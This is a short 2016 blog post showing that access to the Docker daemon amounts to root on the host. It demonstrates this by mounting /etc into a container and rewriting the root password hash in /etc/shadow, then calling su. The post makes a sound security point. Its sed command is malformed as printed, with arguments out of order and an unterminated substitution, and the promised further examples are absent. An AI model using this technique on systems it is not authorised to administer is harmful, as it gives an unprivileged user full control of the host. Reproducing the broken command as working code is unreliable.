2016-09-20 - root via docker

docker's logo

there are a lot of discussions regarding docker and its security features. there are two main aspects here:

  1. can application, started as a non-root, inside a container, escape from it?
  2. can we gain root access by having an access to docker?

in this post i'd like to quickly answer 2nd question. just try this one out:

docker run -it --rm -v /etc/:/mnt debian:stable
sed -i /mnt/shadow 's#^root:.*#root:YOUR_PROPERLY_ENCODED_PASSWORD_GOES_HERE:0:0:99999:7:::'
exit
su # type in your new password

and voila – you're root now.

how does it work? it's simple – we're mapping content of /etc/ from root filesystem (docker's daemon can access it) as /mnt inside our (temporary) container. inside the container, with root privileges, we edit shadow file, to set our own password.

is it the only way to go? definitely NO! some more examples follow:

…and probably many more, alike. i think you get the point.

long story short – giving any user access to docker daemon means effectively giving her a root access.